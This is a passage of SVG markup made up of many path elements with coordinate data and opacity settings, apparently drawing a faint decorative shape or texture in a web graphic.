0)\" opacity=\"0.3\"></path>\n <path d=\"M1327.11,52.14c-.17.17-.35.37-.55.6C1326.76,52.51,1326.94,52.31,1327.11,52.14Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M1325.91,53.49l-.73.87Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M1319.78,60.86l-.55.61Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M490.08,71.64l.42.41.95-.4c-.2-.67-.4-1.34-.59-2Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M1086,41.78l-4.89-.68C1082.87,44.39,1083.61,44.49,1086,41.78Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M1076.57,42.78l.45-1.1-1.31.45Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M565.79,29.66c.06-1.93-.63-4.54,2.58-4.94-1.36-3.09-2.72-.45-3.76.19s-1.65,1.89-2.45,2.88c.21-2.7-.49-6.21,3.19-6.42,5.16-.29,9.71-4.39,15.25-2.3.42.15,1.4-1.2,2.12-1.86-3.88-.15-7.73-1.19-11.6.57-2.71,1.23-6,1.38-8.43,3-1.57,1-2.22,3.68-2.88,5.74-.33,1.07.65,2.59.25,3.58A4.58,4.58,0,0,1,557.24,32c-.34.1-1.7-1.43-1.62-2.1a49.65,49.65,0,0,1,1.49-6.3A3.94,3.94,0,0,0,554.27,25c-.57.65-.81,1.6-1.41,2.19-2.5,2.45-2.2,7.69,1.09,8.56,2.94.79,6.48.12,9.56-.67C565.92,34.5,565.73,31.88,565.79,29.66Z\"\n transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M590,17.37c2.15,1.32,4.17.62,5.05-2.05-3-.28-6-.64-9-.8-1.78-.1-3.49.23-3.33,2.69C585.19,16.1,587.47,15.79,590,17.37Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M523.5,50.6l-6.22-.66C519.18,51.84,521.13,53.28,523.5,50.6Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M544.57,52.59l4.79-.53-6.14-.22Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M539.19,51.31H535Q537.09,54.13,539.19,51.31Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M674.64,5.51c3.24,2.44,6.72,1.7,10.21.74C681.62,3.7,678.1,5,674.64,5.51Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M621.45,9.64l-4,.6C619,11.45,620.43,12,621.45,9.64Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M557.51,52l3.44.5C560,51.14,558.9,50.51,557.51,52Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M678,35.46l-1.27,0c-2,.15-4.63-2.1-5.91,1.06-.88,2.19-.79,4.75,1.62,5.94,1.26.62,3.1,0,4.67,0C676.91,40.05,681.62,38.29,678,35.46Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M642,34.88l-1.44,2.06,2.08,3.75c-5.91.72-7,.08-6.56-3.72q.84-2.46,1.7-4.92L642,33.53c0-1,.27-2.25-.21-3a42.76,42.76,0,0,0-3.9-4.46c-5.63,3.6-4.11,9.68-5.71,14.76,3.08.93,5.82,1.68,8.51,2.58,1.68.55,2.88.21,2.71-1.65A63.89,63.89,0,0,0,642,34.88Z\"\n transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M654.52,37.15c-3-1-4.73.23-5.47,3.53a46,46,0,0,0,5.11,3.74,2.69,2.69,0,0,0,2.54-.71C658,41.13,656.79,37.88,654.52,37.15Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M380.12,72.88h1.16l2.19-5.26-6.27.06Q378.67,70.29,380.12,72.88Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M395.07,63.86l-.15.12c1.42.52,2.34.41,3-.09l-.49.1Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M399.1,60.78q-2,1.55-4,3.08l2.32.13.49-.1A4.77,4.77,0,0,0,399.1,60.78Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M399.1,60.78q-2,1.55-4,3.08l2.32.13.49-.1A4.77,4.77,0,0,0,399.1,60.78Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M1664.81,72.6c-3.76.14-6.25-1-5.79-5.51-8.24.44-12.2-4.51-14.84-10.85l-5-.11,1.38-4.74L1637.29,50l-1.19-.25-2.21,3.28c-3.28,0-6.71-.25-10.11,0-2.36.17-3.93-.55-5-2.57-2.3.18-4.39.65-4.6,3.8-3.45-1.88-5.94.25-8.64,1.62-2.88,1.45-5.82,2.79-8.73,4.18,0,3.7-3.85,4.65-5.47,7.21-.19.3-2.22-.56-4.11-1.08a5,5,0,0,1-1.9,1.28c-1.07.3-2.75.47-3.42-.14-2.52-2.26-4.74-4.86-7.28-7.57L1569.3,64c.26.79.58,1.71,1,3-4.84,0-8.94-.8-11.86-4.8-1-1.44-4.38-.65-5.42,1.28-.62,1.15-1,2.4-1.61,3.69-3.49-1.8-6.64-2.52-10.12.2l-1-6.9-1.73,1a28.62,28.62,0,0,1-.39,3.35,3,3,0,0,1-5,1.65c-3.85-3.61-4.45-3.68-8.87-1a9.11,9.11,0,0,1-1.13.48c-.07-1.6.41-3.62-.34-4.33-1-.89-2.92-.69-4.44-1a11.3,11.3,0,0,0-3-.6,4.21,4.21,0,0,0-2.82,1.14c-3,4.1-5.26,4.64-9.73,2.09a38.14,38.14,0,0,0-3.73-1.53l3.55,4.65c-3.76-.14-5.79-1.6-7.27-3.65-1.3-1.8-2.32-2.25-4.45-1.1-3.31,1.78-6.88,3.07-10.48,4.63l-1.82-2.69c-1.9.35-2.84,4-5.56,1.39.28-.32.56-.59.8-.9.67-.86,1.71-1.67,1.85-2.62.09-.57-1.27-1.93-1.92-1.9a3.45,3.45,0,0,0-2.45,1.77c-.94,2.21-2.11,3.13-4.3,1.57l-3.38,4-2.57-3.17L1458,65.6l-.72-.38c.4-1.32.81-2.64,1.36-4.43a8.88,8.88,0,0,0-1.73,1.1c-2.58,2.82-2.2,2.48-4.89-.34-1.6-1.68-4.57-2.06-7.18-3.14l-2.06,6-6.73-4.13-1.95,4.61c-3.35-1.89-1.19-4.44-1.42-6.94l-3.06,1.52c-2.06-4.1-5.47-6.59-8.27-6l0,0c0,1.45,0,2.91-.17,4.35s-.11,3.36-.89,3.8a24.34,24.34,0,0,1-7.85,3c-.84.14-2.57-2-3-3.39-.92-2.73-2.66-2.19-3.72-.87-1.66,2.07-3,3.61-5.78,1.86-.4-.25-1.47.59-3,1.26.28-3.12.52-5.88.78-8.8-3.9.23-4.2,4.76-6.84,7.06l2.77.25c-.3,2.21-.58,4.37-.9,6.79-4.36,1.6-8.33,1-12-3.82-.45,2.68-.71,4.27-1,5.86l-1.23,0-.09-5.57c-4.85-.22-5.88-1.3-7.45-7.5a10.27,10.27,0,0,0-1.53-2.56c-.86.79-2.06,1.42-2.52,2.39a.8.8,0,0,0-.07.2,17.91,17.91,0,0,0,3.35.38,31.12,31.12,0,0,1-2.69,4.41,7.22,7.22,0,0,0-.73-.83,7,7,0,0,0,2.45,3.09,4.87,4.87,0,0,1,1.22,2c.26.57.23,1.69.54,1.77,4.24,1.08,3.72,5.67,6.08,8.1a3.78,3.78,0,0,1,.28,1.17c4.9,1.81,11.61,0,7.49,7.22.93,0,1.86,1.46,2.78,1.5a1.93,1.93,0,0,0,1.31-1.52c0-.09.18-.23.25-.21,4.15.85,5.2-1.72,6-5,.1-.38,2.77-.11,5.19-.16.64-1.69,1.6-4.22,2.34-6.2,2.16-.59,4-1,5.69-1.6,2.08-.75,3.19-.5,3.27,2a2.8,2.8,0,0,0,4.42,2.37l2-1.18,1.72-1.08c.23.8.41,1.44.59,2.08l4.49-1.27c.76-3.18,4.75-6.31,7.59-5.52,1,.27,1.55,1.92,2.32,3,2.69-.45,5.41-.82,8.09-1.36,4.48-.92,9.45,2.06,13.59-1.73.22-.21.86.05,1.31.08a27.18,27.18,0,0,0,5,.23c2.43-.32,4.79-1.43,7.21-1.5,7.3-.21,14.6-.08,21.91-.07,3.35.46,6.71.91,10.06,1.38l4-.22c1.29-.37,2.7-1.28,3.85-1,3.3.72,6.47,2.06,9.62-.47a3.24,3.24,0,0,1,2.29-.3c5.84.94,11.67,1.9,17.49,3a11.89,11.89,0,0,1,2.91,1.47l1.34-.12a7.76,7.76,0,0,1,2.34-1c3.41-.24,6.83-.33,10.25-.46a.46.46,0,0,1,.33.07c5.27,4.14,11.33.27,17,2l3,5.61c2.23-3.22-.92-7.65,3.41-8.37,2.25.11,4.63-.19,6.71.47,1.82.57,4.56.94,4.14,4.18a15.57,15.57,0,0,0,.45,3.63l3.83-.53c-.31-1-1-2.12-.76-2.82.37-1,2-2.38,2.25-2.23,2.63,1.6,3-.55,4.13-3,3.4,2,6.75,3.57,9.72,5.7,2,1.42,3.35.52,5-.2,2-3.33,3.3-3.71,6.5-2.07a36,36,0,0,0,3.67,1.4c1.91-4.84,8.35-7.47,13.09-5.71a10.29,10.29,0,0,0,3.93.58c2.66-.1,4.6.16,5.78,3.26s3.55,1.73,5.58-.06c5.34,4.46,11.13,7.37,18.27,5.13-.56-1.46-1.13-2.92-1.69-4.37C1668.51,72.76,1666.65,72.53,1664.81,72.6Z\"\n transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M1367.53,62.55a31.12,31.12,0,0,0,2.69-4.41,17.91,17.91,0,0,1-3.35-.38,5.14,5.14,0,0,0-.07,4A7.22,7.22,0,0,1,1367.53,62.55Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M1367.53,62.55a31.12,31.12,0,0,0,2.69-4.41,17.91,17.91,0,0,1-3.35-.38,5.14,5.14,0,0,0-.07,4A7.22,7.22,0,0,1,1367.53,62.55Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M1350.53,53.61a12.91,12.91,0,0,1,5.93.69c.72.26,2-.44,2.76-1a12.13,12.13,0,0,0,2-2.32c.51,2.08,1,3.92,1.4,5.67l1.88.53a13.59,13.59,0,0,0,.91-3.92,7.69,7.69,0,0,0-1.12-4.78c-3.86-5.23-3.61-8.25,1.59-12.2l-1-2.41-3.27,1.17c-1.39,3.27-4.58,2.18-7,2.88l-4.15.64-2.78,5.82c.14.88.27,1.75.41,2.62,1.78,1.32.75,2.12-.54,2.86-1.6.92-3.2,1.82-4.8,2.73l.07.06,1.06,0A24.11,24.11,0,0,1,1350.53,53.61Z\"\n transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M1363.39,59.73l.08-.16-.13-.06Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M1362.64,56.67c.24,1,.47,1.9.7,2.84l.13.06q.6-1.2,1-2.37Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M1362.64,56.67c.24,1,.47,1.9.7,2.84l.13.06q.6-1.2,1-2.37Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M1350.53,53.61a24.11,24.11,0,0,0-6.62-1l-1.06,0,2.37,2.32A20.91,20.91,0,0,1,1350.53,53.61Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M1350.53,53.61a24.11,24.11,0,0,0-6.62-1l-1.06,0,2.37,2.32A20.91,20.91,0,0,1,1350.53,53.61Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M1904.67,105c-4.63-4.2-8.58-9.71-16.11-8.24a1.27,1.27,0,0,1-.94-.32c-2.87-2.78-5.66-2-8.11.22-2.16-1.59-3.91-3.38-6-4.25-1.51-.62-4-.66-5.22.23-2.55,1.92-5.26,1.35-7.94,1.61-.49,0-1.34-.59-1.46-.44-2.78,3.3-4.85.39-7.25-.82l-.95,1.13-8-.57,1.62,1.88,1.31-.09,3.89.68a27.36,27.36,0,0,0,5.26.81c3.42-.11,6.85-.51,10.26-.92a6.53,6.53,0,0,0,2.39-1.06c2.51-1.5,4.93-.16,5.11,2.8a7.37,7.37,0,0,0,.4,1.8c3.42-.78,6.66-2.57,9.08-1.79,2.83.9,5.25.33,7.87.48,1.77.1,4.3.69,5.07,1.94C1897.6,104.32,1899.41,105.54,1904.67,105Zm-54-10.88Z\"\n transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M1779.25,94.49c-.56-.77-1.56-2.16-2.4-3.34L1772,94.69l-7.26-7.64c-.54,1.71-.92,2.92-1.59,5l-5-5.65-1,3.54c-2.11-1.68-4-3.19-5.9-4.71l-.63.64c.37,1.73.75,3.47,1.12,5.2a6.41,6.41,0,0,1,1.94-.09c4.59,1.21,9.17,2.43,13.71,3.79a12.94,12.94,0,0,1,2.87,1.77c3-1.41,6-3.41,9,0l1.22-.18c1.74-.63,3.55-1.15,5.23-1.93,2.21-1,4.32-2.27,6.47-3.43-2.52.6-5,1.14-7.54,1.8C1783,93.24,1781.29,93.84,1779.25,94.49Z\"\n transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M1712.48,80.52c-2.44,2.26-4.44,1-6.69.37-1.71-.45-3.42-.87-5.13-1.31l.38.94c-1.25.82-2.67,2.51-3.7,2.3a26.81,26.81,0,0,1-7-3A28.61,28.61,0,0,0,1675,76.56l-1.76.73a2.52,2.52,0,0,1,.08.55c2.37.33,4.74.68,7.12,1,.54.07,1.18-.17,1.65,0,2.47,1.08,4.91,2.26,7.36,3.4L1692,82c1.18.3,2.57.3,3.5,1,2.19,1.5,4.06,2,6.39.17,1-.73,2.92-1.24,3.82-.74,4.17,2.29,8-.62,12-.33C1716.35,80.15,1714.05,79.07,1712.48,80.52Z\"\n transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M1899.35,115.9l0,0c.09.56.18,1.13.28,1.7,2.05-.79,4.27-.89,7.51.73,0-1.07,0-2,.05-2.8A10.94,10.94,0,0,0,1899.35,115.9Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M1836.36,93.51a2.14,2.14,0,0,1-2.07.29c-3-2.07-7.49-2.27-8.52-6.81-.06-.27-.72-.4-1-.53a13.68,13.68,0,0,1-2.71,2.53c-2.28,1.15-4.69,2-7.06,3l4.21.73,1.28-.88,2.63-.37c1.11-.09,2.37-.56,3.3-.2,3,1.16,6,2.63,8.94,4l3.23-1,2.65-1.15C1839.51,91.87,1837.9,91.28,1836.36,93.51Z\"\n transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M1727.53,82.77c-2,1.34-7.35,1.1-9.59-.42-.6,3.09,1.11,3.46,3.55,3.09,6-.94,11.13.12,13.86,6.49.34.8,1.84,1.12,2.81,1.66-1.94-3.06-4-6.07-5.79-9.2C1731.16,82.33,1729.86,81.22,1727.53,82.77Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M1795.58,90.34l4.15,5.71,3.54.31,2-.34-.12-1.32A15.34,15.34,0,0,1,1795.58,90.34Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M1743.5,89.25c-1,.45-1.29,2.49-1.89,3.84l3-3,4,3.33,2.54-1.61c-1.19-.39-2.39-.76-3.57-1.19C1746.11,90.13,1744.42,88.82,1743.5,89.25Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M1807.27,89.45c-.13,1.85-.21,3-.29,4.23l2.87,1,3.18-2C1810.42,94,1809.32,90.83,1807.27,89.45Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M1813,92.69a5.39,5.39,0,0,0,.68-.43Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M1741.6,93.1l-2.77.67C1740.15,95.2,1741.08,95,1741.6,93.1Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M1793.51,90.08l1.31-.27-1.08-1.71C1793.62,89.11,1793.56,89.6,1793.51,90.08Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M1380.52,59.15c2.15,1.79,3.21.94,5.41-4.5a45.93,45.93,0,0,0-3.11-5.31c-.66-.85-2-1.21-3-1.79-.22,1-.94,2.3-.57,3,1.18,2.42.69,4.27-1.13,6.07l-3.17-.95-1.07.76,2.7,4.92Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M1362.6,59.18c-1.5-.63-3.34-.38-5-.73-4.94-1.05-9.84-3-14.78-3.07-4.45-.06-8.28-1.57-12.35-2.59-.47-.11-.85-.6-1.27-.91l-1.29-.41c-.71-.12-8.9,11-9.52,10.67-16.28-9.53-32-9.06-39.59,8.59-1.77,4.08-5.83,4.23-10.7,3,.88,2.86,3.27,1.83,5.35,1.7,4.06-.25,8.11-.74,12.16-.66,7,.15,13.29-5.28,20.49-5.78,4.87-.34,7.63-5.18,12.53-4.58,2.64.33,12.67-10,15.23-9.32,4.88,1.38,9.82,2.69,14.55,4.5A46.36,46.36,0,0,1,1358.72,65a35,35,0,0,1,3.57,3,27.72,27.72,0,0,0,5.24-5.44A11.18,11.18,0,0,0,1362.6,59.18Z\"\n transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n <path d=\"M1265.91,71.75a4.27,4.27,0,0,1-2.24.72c1.53.5,3,1,4.45,1.31a6,6,0,0,1-.16-.67C1267.84,72.52,1266.21,71.56,1265.91,71.75Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n <path d=\"M1228.49,66a13.19,13.19,0,0,0-4-.24c-2.93,0-5.88.15-8.8-.06-7-.51-13.91-1.31-20.88-1.76-6.08-.39-12.18-.55-18.27-.68-7.89-.18-15.79-.24-23.68-.32-4,0-8.08-.08-12.12,0-2.11,0-4.22.37-6.33.54a5.91,5.91,0,0,1-2.61,0c-3.66-1.62-7-1-10.37.87-.75,1.58-1.48,1.55-2.2,0l-1.22,0-2.47,2.29a30.58,30.58,0,0,1-3-4.62c-.44-1-.08-2.38-.81-4l-2.85,3c-.14-.28-.53-.73-.43-1,2-4.41-.9-6.44-4-8.29a3.72,3.72,0,0,0-2.5-.41c-6.11,1.53-6.11,1.57-9.09-4.29a30,30,0,0,1-1.2-2.79c-1.64-4.42-1.64-4.43-5.69-2.55-2.35,2.71-3.09,2.61-4.89-.69l-4,.59-.45,1.1-.86-.65-6.19,1.23c-1.52,1.88-3,3.62-5.75,1.69-.59-.41-2.09.22-3,.67a19,19,0,0,0-2.82,2l-2,.7c-.44,3.32-3.51,2.53-5.46,3.49l5,4.48a74.68,74.68,0,0,0,4.52-7c2-3.94,5.19-1.66,7.81-2.26l.54,1-6,4.6c3.36.48,5.89,1.22,8.44-.93,1-.87,2.82-.88,4.28-1.19,1-.22,2.4.09,3.1-.48,2.25-1.84,4.36-.89,5.7.66.68.79-.24,3-.5,5l9.51,3.68c-.43,1.15-.94,2.51-1.44,3.87,3,0,5.92-.2,8.84.05,4.21.35,8.52,0,12.2,3.2,2,1.71,4.78,2.65,7.38,3.28,1.4.33,3.81-.24,4.58-1.28,1.7-2.31,4.35-3.72,6.47-1.89s3.4,1,5.06-.56,3.53-2,5.67,0c1.06,1,3,1.06,4.62,1.22,2,.2,4,0,6.53,0,2.43-2.7,6-.62,9.34-.88,1.77-.13,3.65.36,5.32-.07,3.63-.91,7.06-1.14,10.22,1.17,3.44,2.51,5.13,2.45,8.17-.26a3.89,3.89,0,0,1,2.32-1c3.09,0,6.18.25,9.26.49,5.39.41,10.85,1.66,16.14,1.17,10-.92,18.81,3.75,28.26,5.23a40,40,0,0,0,6,0c0-.36,0-.72,0-1.08a4.5,4.5,0,0,0,6.73-.29,3.33,3.33,0,0,1,4-1.08c1.67.53,3.29,1.64,5.08,1.59-5.4-1.8-11.22-4.2-15.81-4.32C1241.28,68,1234.8,68.2,1228.49,66ZM1092.16,55.67a.55.55,0,0,1-.52-.22c-.06-.14.13-.37.21-.56l.57.24C1092.34,55.32,1092.3,55.62,1092.16,55.67Z\"\n transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n <path d=\"M539.19,51.31q-2.1,2.82-4.2,0l-4-.08-3.36,3.83-2.17-4.4-1.93-.06c-2.37,2.68-4.32,1.24-6.22-.66l-7.43-.1c-2.26.12-4.6.67-6.75.24-3.3-.67-4.17-.36-4.77,3.15.57,1.38,1.14,2.77,1.91,4.62l-5.83.32L493.47,60q-1.26,3.79-2.53,7.59c0,.68-.06,1.35-.08,2,.19.68.39,1.35.59,2l2-1.35c0-4-.33-8.25,4.45-9.92,2.53-.89,3.32-2.36,3.13-4.81a33.14,33.14,0,0,1,.16-3.84c1.47.38,2.59.64,3.69,1,1.27.38,2.53,1.23,3.77,1.19,6.47-.24,11.1,2.17,12.94,8.66.8,2.81,2.64,4,5.32,4.32-.43-2.48-2.15-5.21,1.37-6.9-.4-3,2.15-5.88,5.72-6a10.91,10.91,0,0,1,5.51,1c3.26,1.92,4.15,0,5.06-2.42l-1.35-.75Z\"\n transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n <path d=\"M407.63,65c.19-.78-1.11-1.93-1.73-2.91a19.22,19.22,0,0,1,3.79,2.16,10.51,10.51,0,0,0,2.88,2,15.17,15.17,0,0,1,3.2-.36h.3a6.77,6.77,0,0,0,1.27-1.29c-.56-.2-1.17-.24-1.49-.56s-.91-.87-1.33-1.33l-8.81-1.17a5.59,5.59,0,0,1-1.37.82c-.65.16-1.31.3-2,.45a4.38,4.38,0,0,0-.43,1.49,3.89,3.89,0,0,1,2.34,1.85h0a7.52,7.52,0,0,0,3.54.79A2.26,2.26,0,0,1,407.63,65Z\"\n transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n <path d=\"M454.88,67.81c-7.81-1.91-16.06.63-23.59-2.89-.28-.13-.68,0-1,0l-9.62-1.27a10.5,10.5,0,0,0,1.83,2.4,32.85,32.85,0,0,1,11.19,1.73c3.6,1.33,7.7,1.37,11.59,1.87,4.35.56,8.78-.92,13.12,1.78,2.21,1.37,5.71.6,8.61,1a45.91,45.91,0,0,1,4.89,1.08c1.74.39,3.46.79,3.94-1.71l-.77-1.08C468.32,69.73,461.44,69.41,454.88,67.81Z\"\n transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n <path d=\"M397.39,64l.22.08a1.81,1.81,0,0,0,.27-.18Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n <path d=\"M596.54,47.52c-3.67,1.37-7.25,3-10.31,4.27L580,49.12l-1.23.66a31.65,31.65,0,0,1-4.27,2.07,48.3,48.3,0,0,1-5.4,1.12c0,.32,0,.65,0,1,3.79-.66,7.76-1.87,9.71,4.77,1.76-8,5.42-2.43,8.15-2.87.34-.84.64-1.62,1-2.44l2.53,1-.27-1.12,4.74-2.09,2.78-2,1.33,0c0-.3,0-.59,0-.89C598.22,48,597.2,47.27,596.54,47.52Z\"\n transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n <path d=\"M909.5,30.4l-1.33-.23-1.39,1.16,2.89.56C909.61,31.39,909.55,30.9,909.5,30.4Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n <path d=\"M689.59,6.87l-4.74-.62c-3.49,1-7,1.7-10.21-.74-6.36.51-12.8.34-18.93,2.74a6,6,0,0,1-4.36-.58c-3.05-1.58-5.77-1.31-7.28,1.54-1.29,2.41-2.39,2.22-4,.46-2.08-2.26-4.24-2.5-6.83-.48-.89.69-2.6.4-3.94.43-2.61.05-5.23,0-7.84,0-1,2.33-2.46,1.81-4,.6l-2.63-.05L612,9.75l-1.3,0L607.9,11l-12.81,4.28c-.88,2.67-2.9,3.37-5.05,2.05-2.57-1.58-4.85-1.27-7.31-.16h0c-.72.66-1.7,2-2.12,1.86-5.54-2.09-10.09,2-15.25,2.3-3.68.21-3,3.72-3.19,6.42.8-1,1.43-2.26,2.45-2.88s2.4-3.28,3.76-.19l2,2.13,13.75-3.14c.89.15,2.16,2.24,3,2.08,2.76-.57,3.08.66,3.23,2.79,0,.66.88,1.26,1.35,1.89.36-1.6-.25-3,0-4.16a11,11,0,0,1,2.19-4c.2-.27,1.37.11,2.07.31,1.35.4,2.7,1.3,4,1.23,4.93-.28,7.66.7,8.81,6.51.47,2.41,1.78,3.41,4.28,3.14a28,28,0,0,1,4.47.2c3.43-.46,6.8-.75,9.24,2.5,1.42,1.89.87,5-1.31,5.25-2.74.29-3.43,1.48-3.32,3.92,0,.63-.76,1.29-1.17,1.94-.17.28-.31.8-.52.82-3.7.5-7.39,1-11.1,1.31a4.79,4.79,0,0,1-2.56-1.08c-2.14-1.42-4.24-2.19-6.42-.13,3.2,2.24,6.41,4.46,9.6,6.71.71.5,1.35,1.11,2,1.67l6.16-4.52,3.65,4.7,3.12-2.22,4.38-5.54,1.5.44c-.09,2-.23,3.94-.24,5.9,0,.73.15,1.89.58,2.07a2.66,2.66,0,0,0,2.33-.28c1.74-1.48,3.27-1.69,5.13-.2a13.22,13.22,0,0,0,3.1,1.4,29.4,29.4,0,0,0,.88-3.44,17.25,17.25,0,0,0-.21-3.11h-7c-.91-3.94,3.58-3.21,5.15-4.57,2.31-2,4.88-.07,6.74,2,5-5,3.8-5.21,12.22-.4l5.06-7.23c.48,2.19.72,3.3,1,4.78,2.1-4.3,2.88-4.3,5.73-1.12a7.44,7.44,0,0,0,4.27,2.35,45.42,45.42,0,0,0,10.16,0,5.08,5.08,0,0,0,3.59-2.81A5.3,5.3,0,0,0,688,40.43c-1.13-1.14-3.13-1.42-5-2.18-.5-2.48-1.7-4.39-5-2.79,3.6,2.83-1.11,4.59-.89,7-1.57,0-3.41.6-4.67,0-2.41-1.19-2.5-3.75-1.62-5.94,1.28-3.16,3.88-.91,5.91-1.06-.44-.78-.83-1.59-1.33-2.33-2.26-3.31-3.87-3.48-6.69-.82a6.4,6.4,0,0,1-2.42,1.67,62.13,62.13,0,0,1-6.15,1l-1.88-1.38-1.52,2h-8.27c1.33-5.28,2.68-10.65,4.11-16.31-4.69,1.4-3.38,6.54-6.6,9-.92-2.35-2.33-4.53-2.5-6.81-.14-2-.06-4.69,2.8-5.56,1.48-.45,3-.92,4.43-1.4s2.73-1,4.14-1.36c2.09-.51,4.21-.88,6.55-1.35l.93,2.22c4.46-4.06,8.06-7.14,15.18-6.16C686,9,694,12.55,702.68,11.92a1.92,1.92,0,0,1,1.27.45c3,2.56,4,.72,4.66-2,.21-.87.53-1.72.79-2.59-5.35,0-10.71,0-16.06-.09A20,20,0,0,1,689.59,6.87ZM654.52,37.15c2.27.73,3.48,4,2.18,6.56a2.69,2.69,0,0,1-2.54.71,46,46,0,0,1-5.11-3.74C649.79,37.38,651.49,36.18,654.52,37.15Zm-13.87,6.29c-2.69-.9-5.43-1.65-8.51-2.58,1.6-5.08.08-11.16,5.71-14.76a42.76,42.76,0,0,1,3.9,4.46c.48.72.17,2,.21,3,0,.45,0,.9,0,1.35a63.89,63.89,0,0,1,1.36,6.91C643.53,43.65,642.33,44,640.65,43.44Z\"\n transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n <path d=\"M704.78,41.63c-.52,3.77-1.6,4.69-5.5,4.49,0-3.14,2.62-3.69,4.68-4.74a1,1,0,0,0,0-.49,30,30,0,0,0-4.4-3.71c-.91-.53-2.35-.11-3.55-.12,0,1.14,0,2.28,0,3.41s.79,2.16.45,2.9c-1.18,2.64-1.06,4.29,2.27,4.71a13.59,13.59,0,0,1,3.13,1.19L706,44.44c-.25-1-.5-2-.74-3A.67.67,0,0,0,704.78,41.63Z\"\n transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n <path d=\"M394.46,63.7c-2.38-.94-4.73-2.35-7.16-2.52-2.15-.15-4.3-.15-6.46-.1l3.56,3.78c2,0,4.05,0,6.07,0l1.07-.38Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n <path d=\"M372.31,61.37c1,.48,2,.93,3,1.44,1.29.66,2.55,1.36,3.83,2h5.28l-3.56-3.78C378,61.15,375.15,61.31,372.31,61.37Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n <path d=\"M800.56,9.76v4.17c1.09-.25,2.2-.45,3.28-.74,4.21-1.14,8.37-1.59,12.42.6l1.36,0L819,12.51a5.11,5.11,0,0,0-1.43-.7C811.89,11.1,806.22,10.44,800.56,9.76Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n <path d=\"M474.07,102c-2.15-.7-4.42-1-5.84,2.23,2.34.53,4.31,2.49,6.5.22A2.79,2.79,0,0,0,474.07,102Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n <path d=\"M602,70.4c1.74.47,3.51.81,5.28,1.17l.39-2.1-5.51-.87A9.61,9.61,0,0,0,602,70.4Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n <path d=\"M790.24,10.21l4.23.85h2v-.69C794.45,9.12,792.39,7.81,790.24,10.21Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n <path d=\"M560.88,52.66l.74,1.36,2,0,.81-1.24-.86-.35Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n <path d=\"M535.05,70.31l1.39.76.68-.07c0-.71,0-1.42-.08-2.13Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n <path 